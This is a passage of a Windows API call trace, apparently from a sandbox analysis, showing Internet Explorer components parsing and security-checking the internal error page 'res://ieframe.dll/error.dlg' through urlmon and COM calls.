cchResult=0x1c, pcchResult=0x198ec8, dwReserved=0x0 | out: pwzResult="", pcchResult=0x198ec8*=0x27) returned 0x1 [0159.000] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.000] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x194e34 | out: ppURI=0x194e34*=0x68e1fc) returned 0x0 [0159.000] IUri:GetHost (in: This=0x68e1fc, pbstrHost=0x194e38 | out: pbstrHost=0x194e38*="ieframe.dll") returned 0x0 [0159.000] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.001] GetProcAddress (hModule=0x703b0000, lpProcName="CoInternetParseUrl") returned 0x703eaf80 [0159.002] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x194d84 | out: lpflOldProtect=0x194d84*=0x4) returned 1 [0159.003] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x194e40, cchResult=0x1000, pcchResult=0x194e28, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x194e28) returned 0x0 [0159.003] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.004] GetProcAddress (hModule=0x743f0000, lpProcName=0x3) returned 0x744049a0 [0159.004] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x194d98 | out: lpflOldProtect=0x194d98*=0x4) returned 1 [0159.004] SysReAllocString (in: pbstr=0x194e38*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x194e38*="ieframe.dll") returned 1 [0159.005] IUri:GetPath (in: This=0x68e1fc, pbstrPath=0x194e3c | out: pbstrPath=0x194e3c*="/error.dlg") returned 0x0 [0159.005] CoInternetParseUrl (in: pwzUrl="/error.dlg", ParseAction=0x13, dwFlags=0x0, pszResult=0x194e40, cchResult=0x1000, pcchResult=0x194e28, dwReserved=0x0 | out: pszResult="/error.dlg", pcchResult=0x194e28) returned 0x0 [0159.005] SysReAllocString (in: pbstr=0x194e3c*="/error.dlg", psz="/error.dlg" | out: pbstr=0x194e3c*="/error.dlg") returned 1 [0159.005] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6b5cd0 [0159.005] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.005] SearchPathW (in: lpPath=0x0, lpFileName="ieframe.dll", lpExtension=0x0, nBufferLength=0x1000, lpBuffer=0x196e74, lpFilePart=0x196e6c | out: lpBuffer="C:\\Windows\\SysWOW64\\ieframe.dll", lpFilePart=0x196e6c*="ieframe.dll") returned 0x1f [0159.006] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5cd0 | out: hHeap=0x5e0000) returned 1 [0159.006] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.008] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.008] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x198e74 | out: ppvObject=0x198e74*=0x6e784f9c) returned 0x0 [0159.008] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.008] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.dlg", ParseAction=3, dwParseFlags=0x0, pwzResult=0x68cf18, cchResult=0x27, pcchResult=0x198ec8, dwReserved=0x0 | out: pwzResult="file://C:\\Windows\\SysWOW64\\ieframe.dll", pcchResult=0x198ec8*=0x27) returned 0x0 [0159.008] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.008] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x194dfc | out: ppURI=0x194dfc*=0x68e1fc) returned 0x0 [0159.009] IUri:GetHost (in: This=0x68e1fc, pbstrHost=0x194e00 | out: pbstrHost=0x194e00*="ieframe.dll") returned 0x0 [0159.009] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x194e08, cchResult=0x1000, pcchResult=0x194df0, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x194df0) returned 0x0 [0159.009] SysReAllocString (in: pbstr=0x194e00*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x194e00*="ieframe.dll") returned 1 [0159.009] IUri:GetPath (in: This=0x68e1fc, pbstrPath=0x194e04 | out: pbstrPath=0x194e04*="/error.dlg") returned 0x0 [0159.009] CoInternetParseUrl (in: pwzUrl="/error.dlg", ParseAction=0x13, dwFlags=0x0, pszResult=0x194e08, cchResult=0x1000, pcchResult=0x194df0, dwReserved=0x0 | out: pszResult="/error.dlg", pcchResult=0x194df0) returned 0x0 [0159.009] SysReAllocString (in: pbstr=0x194e04*="/error.dlg", psz="/error.dlg" | out: pbstr=0x194e04*="/error.dlg") returned 1 [0159.009] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6b5ca8 [0159.010] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.010] SearchPathW (in: lpPath=0x0, lpFileName="ieframe.dll", lpExtension=0x0, nBufferLength=0x1000, lpBuffer=0x196e3c, lpFilePart=0x196e34 | out: lpBuffer="C:\\Windows\\SysWOW64\\ieframe.dll", lpFilePart=0x196e34*="ieframe.dll") returned 0x1f [0159.010] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5ca8 | out: hHeap=0x5e0000) returned 1 [0159.010] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.013] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.013] IUnknown:Release (This=0x68e1fc) returned 0x5 [0159.013] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6901f0 | out: hHeap=0x5e0000) returned 1 [0159.013] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6d8768 [0159.013] memcpy_s (in: _Destination=0x6d8768, _DestinationSize=0x14, _Source=0x199c38, _SourceSize=0x14 | out: _Destination=0x6d8768) returned 0x0 [0159.013] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690208 | out: hHeap=0x5e0000) returned 1 [0159.013] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6d87a8 [0159.013] memcpy_s (in: _Destination=0x6d87a8, _DestinationSize=0x14, _Source=0x199c38, _SourceSize=0x14 | out: _Destination=0x6d87a8) returned 0x0 [0159.014] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x199df0 | out: ppu=0x199df0) returned 0x0 [0159.014] IUri:GetAbsoluteUri (in: This=0x68e1fc, pbstrAbsoluteUri=0x19a028 | out: pbstrAbsoluteUri=0x19a028*="res://ieframe.dll/error.dlg") returned 0x0 [0159.014] GetCurrentThreadId () returned 0xb48 [0159.014] GetCurrentThreadId () returned 0xb48 [0159.014] GetCurrentProcessId () returned 0xe14 [0159.014] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9510 [0159.014] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.014] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.016] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6b5ca8 [0159.016] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.016] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.016] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.016] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0159.017] IBindCtx:GetObjectParam (in: This=0x6d8128, pszKey="BIND_CONTEXT_REFERRERURL", ppunk=0x199cd4 | out: ppunk=0x199cd4*=0x0) returned 0x80004005 [0159.017] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3c) returned 0x68ed50 [0159.017] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x199c70 | out: ppu=0x199c70) returned 0x0 [0159.017] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x3002b84, dwReserved=0x0, ppURI=0x199c50 | out: ppURI=0x199c50*=0x68e1fc) returned 0x0 [0159.018] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.018] IUnknown:AddRef (This=0x68e1fc) returned 0x7 [0159.018] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.018] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199c04, dwFlags=0x0 | out: pdwZone=0x199c04*=0xffffffff) returned 0x800c0011 [0159.018] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.018] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x198e60 | out: ppvObject=0x198e60*=0x6e784f9c) returned 0x0 [0159.019] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.019] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.dlg", ParseAction=3, dwParseFlags=0x0, pwzResult=0x6c8a98, cchResult=0x1c, pcchResult=0x198e70, dwReserved=0x0 | out: pwzResult="", pcchResult=0x198e70*=0x27) returned 0x1 [0159.019] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.019] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x194ddc | out: ppURI=0x194ddc*=0x68e1fc) returned 0x0 [0159.019] IUri:GetHost (in: This=0x68e1fc, pbstrHost=0x194de0 | out: pbstrHost=0x194de0*="ieframe.dll") returned 0x0 [0159.019] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x194de8, cchResult=0x1000, pcchResult=0x194dd0, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x194dd0) returned 0x0 [0159.019] SysReAllocString (in: pbstr=0x194de0*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x194de0*="ieframe.dll") returned 1 [0159.019] IUri:GetPath (in: This=0x68e1fc, pbstrPath=0x194de4 | out: pbstrPath=0x194de4*="/error.dlg") returned 0x0 [0159.019] CoInternetParseUrl (in: pwzUrl="/error.dlg", ParseAction=0x13, dwFlags=0x0, pszResult=0x194de8, cchResult=0x1000, pcchResult=0x194dd0, dwReserved=0x0 | out: pszResult="/error.dlg", pcchResult=0x194dd0) returned 0x0 [0159.019] SysReAllocString (in: pbstr=0x194de4*="/error.dlg", psz="/error.dlg" | out: pbstr=0x194de4*="/error.dlg") returned 1 [0159.019] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6b5f50 [0159.020] IUnknown:Release (This=0x68e1fc) returned 0xa [0159.020] SearchPathW (in: lpPath=0x0, lpFileName="ieframe.dll", lpExtension=0x0, nBufferLength=0x1000, lpBuffer=0x196e1c, lpFilePart=0x196e14 | out: lpBuffer="C:\\Windows\\SysWOW64\\ieframe.dll", lpFilePart=0x196e14*="ieframe.dll") returned 0x1f [0159.020] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5f50 | out: hHeap=0x5e0000) returned 1 [0159.020] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.020] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.020] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x198e1c | out: ppvObject=0x198e1c*=0x6e784f9c) returned 0x0 [0159.020] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.020] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.dlg", ParseAction=3, dwParseFlags=0x0, pwzResult=0x68d700, cchResult=0x27, pcchResult=0x198e70, dwReserved=0x0 | out: pwzResult="file://C:\\Windows\\SysWOW64\\ieframe.dll", pcchResult=0x198e70*=0x27) returned 0x0 [0159.020] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.021] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x194da4 | out: ppURI=0x194da4*=0x68e1fc) returned 0x0 [0159.021] IUri:GetHost (in: This=0x68e1fc, pbstrHost=0x194da8 | out: pbstrHost=0x194da8*="ieframe.dll") returned 0x0 [0159.021] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x194db0, cchResult=0x1000, pcchResult=0x194d98, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x194d98) returned 0x0 [0159.021] SysReAllocString (in: pbstr=0x194da8*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x194da8*="ieframe.dll") returned 1 [0159.021] IUri:GetPath (in: This=0x68e1fc, pbstrPath=0x194dac | out: pbstrPath=0x194dac*="/error.dlg") returned 0x0 [0159.021] CoInternetParseUrl (in: pwzUrl="/error.dlg", ParseAction=0x13, dwFlags=0x0, pszResult=0x194db0, cchResult=0x1000, pcchResult=0x194d98, dwReserved=0x0 | out: pszResult="/error.dlg", pcchResult=0x194d98) returned 0x0 [0159.021] SysReAllocString (in: pbstr=0x194dac*="/error.dlg", psz="/error.dlg" | out: pbstr=0x194dac*="/error.dlg") returned 1 [0159.021] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6b5e60 [0159.021] IUnknown:Release (This=0x68e1fc) returned 0xa [0159.021] SearchPathW (in: lpPath=0x0, lpFileName="ieframe.dll", lpExtension=0x0, nBufferLength=0x1000, lpBuffer=0x196de4, lpFilePart=0x196ddc | out: lpBuffer="C:\\Windows\\SysWOW64\\ieframe.dll", lpFilePart=0x196ddc*="ieframe.dll") returned 0x1f [0159.022] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5e60 | out: hHeap=0x5e0000) returned 1 [0159.022] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.023] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.023] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.023] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.023] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x2700, pPolicy=0x199c08, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0x199be8 | out: pPolicy=0x199c08*=0x0, pdwOutFlags=0x199be8*=0x0) returned 0x0 [0159.023] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x2700, pPolicy=0x199c08, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x199c08*=0x0) returned 0x0 [0159.023] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.023] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.023] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.024] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.024] IUnknown:AddRef (This=0x68e1fc) returned 0x7 [0159.024] IUri:GetPropertyDWORD (in: This=0x68e1fc, uriProp=0x11, pdwProperty=0x199a0c, dwFlags=0x0 | out: pdwProperty=0x199a0c*=0x12) returned 0x0 [0159.024] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.024] IUnknown:QueryInterface (in: This=0xd1e334, riid=0x703b4c58*(Data1=0xc90db44a, Data2=0x1902, Data3=0x451e, Data4=([0]=0xbd, [1]=0xf0, [2]=0x5c, [3]=0x89, [4]=0x66, [5]=0xb, [6]=0x52, [7]=0x8c)), ppvObject=0x199964 | out: ppvObject=0x199964*=0x0) returned 0x80004002 [0159.024] IInternetSecurityManager:GetSecurityId (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pbSecurityId=0x199a90, pcbSecurityId=0x199a8c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x199a90*=0x0, pcbSecurityId=0x199a8c*=0x200) returned 0x800c0011 [0159.024] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.024] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.024] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6d8788 [0159.024] memcpy_s (in: _Destination=0x6d8788, _DestinationSize=0x14, _Source=0x199a90, _SourceSize=0x14 | out: _Destination=0x6d8788) returned 0x0 [0159.024] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3c) returned 0x68ed98 [0159.024] IUri:GetPropertyBSTR (in: This=0x68e1fc, uriProp=0x3, pbstrProperty=0x199e0c, dwFlags=0x2 | out: pbstrProperty=0x199e0c*="") returned 0x1 [0159.024] IUri:GetPropertyBSTR (in: This=0x68e1fc, uriProp=0x6, pbstrProperty=0x199e0c, dwFlags=0x2 | out: pbstrProperty=0x199e0c*="ieframe.dll") returned 0x0 [0159.027] StrCmpICW (pszStr1="res://ieframe.dll/error.dlg", pszStr2="res://ieframe.dll/PhishSite.htm") returned -11 [0159.027] StrCmpICW (pszStr1="res://ieframe.dll/error.dlg", pszStr2="res://ieframe.dll/PhishSite_Iframe.htm") returned -11 [0159.027] StrCmpICW (pszStr1="res://ieframe.dll/error.dlg", pszStr2="res://ieframe.dll/BlockSite.htm") returned 3 [0159.027] StrCmpICW (pszStr1="res://ieframe.dll/error.dlg", pszStr2="res://ieframe.dll/PhishSite_Iframe.htm") returned -11 [0159.028] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199d1c | out: ppvObject=0x199d1c*=0x68e73c) returned 0x0 [0159.029] IUnknown:Release (This=0x68e73c) returned 0xa [0159.029] IUnknown:AddRef (This=0x68e73c) returned 0xb [0159.029] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.029] IUnknown:AddRef (This=0x68e73c) returned 0xc [0159.029] IUri:GetSchemeName (in: This=0x68e73c, pbstrSchemeName=0x199cd8 | out: pbstrSchemeName=0x199cd8*="res") returned 0x0 [0159.029] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199cd0 | out: ppvObject=0x199cd0*=0x68e73c) returned 0x0 [0159.030] IUnknown:Release (This=0x68e73c) returned 0xc [0159.030] IUnknown:AddRef (This=0x68e73c) returned 0xd [0159.030] IUnknown:Release (This=0x68e73c) returned 0xc [0159.030] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.030] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.030] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.031] IUri:GetScheme (in: This=0x68e73c, pdwScheme=0x199d8c | out: pdwScheme=0x199d8c*=0x12) returned 0x0 [0159.031] IUri:IsEqual (in: This=0x68e1fc, pUri=0x68e73c, pfEqual=0x199ddc | out: pfEqual=0x199ddc*=1) returned 0x0 [0159.031] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.031] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6d8868 [0159.031] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.031] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.032] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.032] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0159.032] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.032] IUnknown:AddRef (This=0x5fc930) returned 0x6 [0159.035] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.035] IUnknown:AddRef (This=0x68e73c) returned 0xd [0159.035] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199d10 | out: ppvObject=0x199d10*=0x68e73c) returned 0x0 [0159.036] IUnknown:Release (This=0x68e73c) returned 0xd [0159.036] IUnknown:AddRef (This=0x68e73c) returned 0xe [0159.036] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.036] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6b5e60 [0159.037] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x1999d4, dwReserved=0x0 | out: ppSM=0x1999d4*=0x6ce708) returned 0x0 [0159.037] IUnknown:QueryInterface (in: This=0x6ce708, riid=0x6d734ed8*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x1999d8 | out: ppvObject=0x1999d8*=0x6ce708) returned 0x0 [0159.037] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6d87e8 [0159.037] IInternetSecurityManager:SetSecuritySite (This=0x6ce708, pSite=0x6d87ec) returned 0x0 [0159.037] IUnknown:AddRef (This=0x6d87ec) returned 0x2 [0159.037] IUnknown:QueryInterface (in: This=0x6d87ec, riid=0x703b4814*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x1999ac | out: ppvObject=0x1999ac*=0x6d87e8) returned 0x0 [0159.037] IServiceProvider:QueryService (in: This=0x6d87e8, guidService=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), riid=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), ppvObject=0x6ce73c | out: ppvObject=0x6ce73c*=0x0) returned 0x80004002 [0159.037] IServiceProvider:QueryService (in: This=0x6d87e8, guidService=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x6ce738 | out: ppvObject=0x6ce738*=0x6d87f0) returned 0x0 [0159.038] IUnknown:Release (This=0x6d87e8) returned 0x3 [0159.038] IUnknown:AddRef (This=0x6ce708) returned 0x3 [0159.038] IUnknown:Release (This=0x6ce708) returned 0x2 [0159.038] IUnknown:Release (This=0x6ce708) returned 0x1 [0159.038] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1999d4 | out: ppvObject=0x1999d4*=0x68e73c) returned 0x0 [0159.038] IUnknown:Release (This=0x68e73c) returned 0xe [0159.038] IUnknown:AddRef (This=0x68e73c) returned 0xf [0159.038] QueryPerformanceCounter (in: lpPerformanceCount=0x199960 | out: lpPerformanceCount=0x199960*=3097785769894) returned 1 [0159.039] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x199968 | out: lpSystemTimeAsFileTime=0x199968*(dwLowDateTime=0x65652de5, dwHighDateTime=0x1d7d80b)) [0159.039] QueryPerformanceCounter (in: lpPerformanceCount=0x1999c0 | out: lpPerformanceCount=0x1999c0*=3097785820353) returned 1 [0159.039] IUnknown:AddRef (This=0x68e73c) returned 0x10 [0159.039] IUnknown:AddRef (This=0x68e73c) returned 0x11 [0159.039] IUnknown:AddRef (This=0x68e73c) returned 0x12 [0159.040] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1999b8 | out: ppvObject=0x1999b8*=0x68e73c) returned 0x0 [0159.040] IUnknown:Release (This=0x68e73c) returned 0x12 [0159.040] IUnknown:AddRef (This=0x68e73c) returned 0x13 [0159.040] IUri:GetScheme (in: This=0x68e73c, pdwScheme=0xd43798 | out: pdwScheme=0xd43798*=0x12) returned 0x0 [0159.040] IMoniker:IsSystemMoniker (in: This=0x613358, pdwMksys=0x199a5c | out: pdwMksys=0x199a5c*=0x6) returned 0x0 [0159.040] IUri:GetSchemeName (in: This=0x68e73c, pbstrSchemeName=0x19999c | out: pbstrSchemeName=0x19999c*="res") returned 0x0 [0159.065] _wcsnicmp (_String1="res", _String2="data", _MaxCount=0x5) returned 14 [0159.066] IUri:GetScheme (in: This=0x68e73c, pdwScheme=0x1999dc | out: pdwScheme=0x1999dc*=0x12) returned 0x0 [0159.066] IUri:GetScheme (in: This=0x68e73c, pdwScheme=0x1999dc | out: pdwScheme=0x1999dc*=0x12) returned 0x0 [0159.066] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1999d4 | out: ppvObject=0x1999d4*=0x68e73c) returned 0x0 [0159.067] IUnknown:Release (This=0x68e73c) returned 0x13 [0159.067] IUnknown:AddRef (This=0x68e73c) returned 0x14 [0159.067] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.067] GetCurrentThreadId () returned 0xb48 [0159.067] IUnknown:AddRef (This=0x6d8128) returned 0x2 [0159.068] IUnknown:AddRef (This=0x6d8128) returned 0x3 [0159.068] IUnknown:Release (This=0x6d8128) returned 0x2 [0159.068] IUnknown:Release (This=0x6d8128) returned 0x1 [0159.068] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.069] GetProcAddress (hModule=0x703b0000, lpProcName=0x1e6) returned 0x70425970 [0159.069] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x199970 | out: lpflOldProtect=0x199970*=0x4) returned 1 [0159.069] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3c) returned 0x5ee728 [0159.070] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x98) returned 0x6ca5f0 [0159.070] IUnknown:AddRef (This=0x6ce708) returned 0x2 [0159.070] SHStrDupW (in: psz="res://ieframe.dll/error.dlg", ppwsz=0x6ca664 | out: ppwsz=0x6ca664*="res://ieframe.dll/error.dlg") returned 0x0 [0159.070] IUnknown:AddRef (This=0x6d8128) returned 0x2 [0159.071] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.071] GetProcAddress (hModule=0x703b0000, lpProcName="RegisterBindStatusCallback") returned 0x70413fe0 [0159.072] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x199924 | out: 